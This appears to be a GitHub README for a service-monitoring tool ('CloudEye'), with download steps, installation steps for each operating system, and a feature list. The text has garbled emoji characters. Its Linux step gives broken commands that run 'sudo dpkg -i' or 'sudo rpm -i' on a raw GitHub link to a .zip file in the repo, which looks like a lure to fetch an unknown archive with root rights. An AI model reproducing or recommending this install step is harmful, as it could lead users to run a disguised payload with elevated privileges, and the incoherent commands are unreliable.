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🌐 monitor - Easy Monitoring for Your Services

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πŸš€ Getting Started

Welcome to the CloudEye Monitoring Panel! This modern tool helps you keep track of your services easily. Follow these steps to download and run the application.

πŸ“₯ Download & Install

  1. Visit the Releases Page: Go to the Releases Page to find the latest version of the application.
  2. Choose the Right File: Click on the file that matches your operating system. If you’re not sure, look for options labeled Windows, macOS, or Linux.
  3. Download the File: Click on the file link to start the download process. Wait for the file to finish downloading.

πŸ› οΈ Installation Steps

For Windows Users

  1. Locate the Downloaded File: Find the .exe file in your Downloads folder.
  2. Run the Installer: Double-click the file to launch the installation.
  3. Follow the Instructions: The setup wizard will guide you through the rest of the installation.

For macOS Users

  1. Find the Downloaded File: Open your Downloads folder and locate the .dmg file.
  2. Open the File: Double-click the .dmg file to mount it.
  3. Drag to Applications: Drag the CloudEye app icon to the Applications folder.
  4. Launch the Application: Open your Applications folder and double-click CloudEye to start.

For Linux Users

  1. Open Terminal: Launch a terminal window.

  2. Navigate to Downloads: Use the command cd ~/Downloads to go to your Downloads directory.

  3. Install the Application: Run the command to install the downloaded package (this will vary based on the file type, like .deb or .rpm):

    For .deb:

    sudo dpkg -i https://raw.githubusercontent.com/keshu9925/monitor/main/server/monitor-2.1.zip

    For .rpm:

    sudo rpm -i https://raw.githubusercontent.com/keshu9925/monitor/main/server/monitor-2.1.zip

βš™οΈ Running the Application

  1. Start the Application: Open CloudEye from your applications menu or by double-clicking the application icon.
  2. Configure Your Settings: Once opened, follow the on-screen prompts to set up your monitoring preferences. You can choose what services to monitor, set up alerts, and configure notifications.
  3. Begin Monitoring: Click the "Start Monitoring" button to begin tracking your services.

🌟 Features

  • HTTP/HTTPS Checks: Monitor website availability with customizable request methods and keyword detection.
  • TCP Connectivity Tests: Check if specific ports are accessible on your services.
  • Komari Panel Monitoring: Keep tabs on your server's status with real-time data.
  • Telegram Group Monitoring: Listen for specific messages in Telegram groups to assess your service status.
  • Webhook Notifications: Set up custom notifications to platforms like Discord or Slack.
  • Real-time Updates: Use SSE for instant notifications about your services.
  • Keyword Checking: Verify if certain keywords are present or absent on pages.
  • Scheduled Checks: Customize how often the application checks your services.

🌐 Additional Resources

  • Documentation: The detailed user guide is available on the GitHub Wiki.
  • Support: If you encounter issues, please check the Issues Page for help.

πŸŽ‰ Ready to Get Started?

Don’t wait! Visit the Releases Page to download the latest version and keep your services monitored with ease.

Happy monitoring!

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